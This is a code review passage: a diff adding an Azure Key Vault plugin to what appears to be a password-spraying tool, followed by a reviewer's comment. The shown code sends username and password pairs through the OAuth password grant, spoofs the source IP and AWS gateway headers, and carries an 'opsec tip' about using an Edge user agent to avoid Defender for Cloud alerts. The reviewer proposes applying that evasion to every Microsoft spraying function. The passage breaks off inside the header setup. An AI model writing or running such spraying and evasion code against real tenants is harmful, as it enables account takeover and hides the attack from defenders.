plugins/azvault/azvault.py

```diff
@@ -0,0 +1,120 @@
+import datetime, requests
+import utils.utils as utils
+
+def azvault_authenticate(url, username, password,  useragent, pluginargs):
+
+    ts = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
+
+    data_response = {
+        'timestamp': ts,
+        'username': username,
+        'password': password,
+        'success': False,
+        'change': False,
+        '2fa_enabled': False,
+        'type': None,
+        'code': None,
+        'name': None,
+        'action': None,
+        'headers': [],
+        'cookies': [],
+		'sourceip' : None,
+        'throttled' : False,
+		'error' : False,
+        'output' : ""
+    }
+
+    body = {
+        'resource': 'https://vault.azure.net',
+        'client_id': '1b730954-1685-4b74-9bfd-dac224a7b894',
+        'client_info': '1',
+        'grant_type': 'password',
+        'username': username,
+        'password': password,
+        'scope': 'openid',
+    }
+
+    spoofed_ip = utils.generate_ip()
+    amazon_id = utils.generate_id()
+    trace_id = utils.generate_trace_id()
+
+    headers = {
+        "X-My-X-Forwarded-For" : spoofed_ip,
+        "x-amzn-apigateway-api-id" : amazon_id,
+        "X-My-X-Amzn-Trace-Id" : trace_id,
+        # Opsec tip: UA must be edge otherwise Defender for cloud will flag it!
```

Comment:
Good note, does this apply to all MS spraying functions? May be good to implement elsewhere?